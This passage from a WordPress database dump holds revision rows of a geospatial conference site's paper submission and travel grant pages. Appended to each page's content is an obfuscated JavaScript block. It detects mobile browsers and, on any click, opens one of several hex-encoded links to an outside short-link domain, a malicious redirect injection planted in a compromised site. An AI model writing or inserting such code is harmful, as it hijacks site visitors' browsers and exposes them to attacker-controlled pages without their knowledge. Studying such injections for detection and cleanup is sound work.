)|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-10-09 01:48:55','2022-10-09 01:48:55','',2659,'https://gsw2023.com/?p=2663',0,'revision','',0),
(2664,1,'2022-10-09 01:49:18','2022-10-09 01:49:18','[vc_row][vc_column][bsf-info-box icon_size=\"32\"]\r\n<div class=\"three_quarter first\">\r\n<ul class=\"nospace\">\r\n 	<li style=\"text-align: justify;\">\r\n<h5><strong>The ISPRS Geospatial Week 2023 will be opened for paper submission. After creation of an account on the <a href=\"https://www.conftool.com/gsw2019/\" target=\"_blank\" rel=\"noopener\">ConfTool website of the Geospatial Week</a></strong></h5>\r\n<h5><strong>, authors will be able to submit either a full paper or an extended abstract to one of the following workshops/themes:</strong></h5>\r\n</li>\r\n</ul>\r\n<div class=\"gap-10\"></div>\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li>\r\n<h6><strong>-Unmanned Aerial Vehicles in Geomatics (UAV-g)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Laser scanning</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Digital Transformation</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Location Based Services (LBS)</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Smartphones and wearable devices for LBS</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Sensors for smart and sustainable cities</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-3D Mobile Mapping and GIS Integration</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Indoor Mobile Mapping</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-LIDAR and SAR Mapping Systems</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Mobile Mapping Applications</strong></h6>\r\n</li>\r\n 	<li>\r\n<h6><strong>-Data Fusion of multi-platform Mobile Mapping Technology</strong></h6>\r\n</li>\r\n</ul>\r\n</li>\r\n</ul>\r\n&nbsp;\r\n<p style=\"text-align: justify; color: red;\">The papers must be prepared according to the <a href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\"> ISPRS guidelines</a>. Paper reviews will be conducted according to the <a href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">ISPRS reviewing process</a>. Note that Full papers should be submitted anonymously. Please also check that your name is not listed in the document properties of the submitted .pdf and not included in the file name!</p>\r\n<p style=\"text-align: justify; color: red;\">Full papers accepted after the review process organised by the workshop convenors will be published in the <a href=\"http://www.isprs.org/publications/annals.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Annals</a>. Authors of accepted extended abstracts (around 1000 words) will be invited to submit their full paper in a later stage for publication in the <a href=\"http://www.isprs.org/publications/archives.aspx\" target=\"_blank\" rel=\"noopener\">ISPRS Archives</a>.</p>\r\n\r\n<div class=\"gap-10\"></div>\r\n<h3>Paper submissions deadlines</h3>\r\n<ul class=\"nospace\">\r\n 	<li style=\"list-style-type: none;\">\r\n<ul class=\"nospace\">\r\n 	<li><strong>-Full paper submission (Annals): March 2023 (hard deadline, no extension)</strong></li>\r\n 	<li><strong>-Abstract submission (Archives): April 2023 (hard deadline, no extension)</strong></li>\r\n 	<li><strong>-Abstract author notification: May 2023</strong></li>\r\n 	<li><strong>-Full paper Author notification: May 2023</strong></li>\r\n 	<li><strong>-Camera ready paper submission: July 2023</strong></li>\r\n</ul>\r\n</li>\r\n</ul>\r\n<div class=\"gap-50\"></div>\r\n<h5 style=\"color: red;\">Useful links:</h5>\r\n<ul class=\"nospace\">\r\n 	<li><a title=\" \" href=\"http://www.isprs.org/documents/orangebook/app5.aspx\" target=\"_blank\" rel=\"noopener\">-Guidelines for Authors</a></li>\r\n 	<li><a title=\" \" href=\"https://www.isprs-ann-photogramm-remote-sens-spatial-inf-sci.net/IV-5/53/2018/\" target=\"_blank\" rel=\"noopener\">-Reviewing process for ISPRS Events</a></li>\r\n</ul>\r\n<div id=\"respond\"></div>\r\n</div>\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','SUBMIT','','inherit','closed','closed','','2659-revision-v1','','','2022-10-09 01:49:18','2022-10-09 01:49:18','',2659,'https://gsw2023.com/?p=2664',0,'revision','',0),
(2665,1,'2022-10-09 01:50:45','2022-10-09 01:50:45','[vc_row][vc_column][bsf-info-box icon_size=\"32\" title_font_style=\"font-weight:bold;\"]\r\n<h5><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023</strong></span></h5>\r\n<span style=\"font-size: 12pt;\">The ISPRS Foundation (TIF) will be offering travel grants to deserving applicants, especially from developing countries, to participate in the <a href=\"https://gsw2023.com/\">Geospatial Week (Egypt GSW’2023)</a>, September 2023, Cairo, Egypt. Please note that The <a href=\"http://www.isprs.org/foundation/Default.aspx\">ISPRS Foundation</a> has limited amount of funds and therefore only limited number of grants will be offered. The following are the important dates for the applicants.</span>\r\n\r\n&nbsp;\r\n<h5><span style=\"font-size: 12pt;\"><strong>TIF TRAVEL GRANT AWARDEES FOR GSW-2023</strong></span></h5>\r\n<span style=\"font-size: 12pt;\">The ISPRS Foundation (TIF) announces the following list applicants as awardees to attend the Geospatial Week 2023 to be held in Cairo, Egypt during Sept. 2-7, 2023. TIF wishes them the very best. They will be informed about the granted amount by e-mail and would be receiving it and the certificate at the venue.</span>\r\n\r\n[/bsf-info-box][/vc_column][/vc_row]\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v 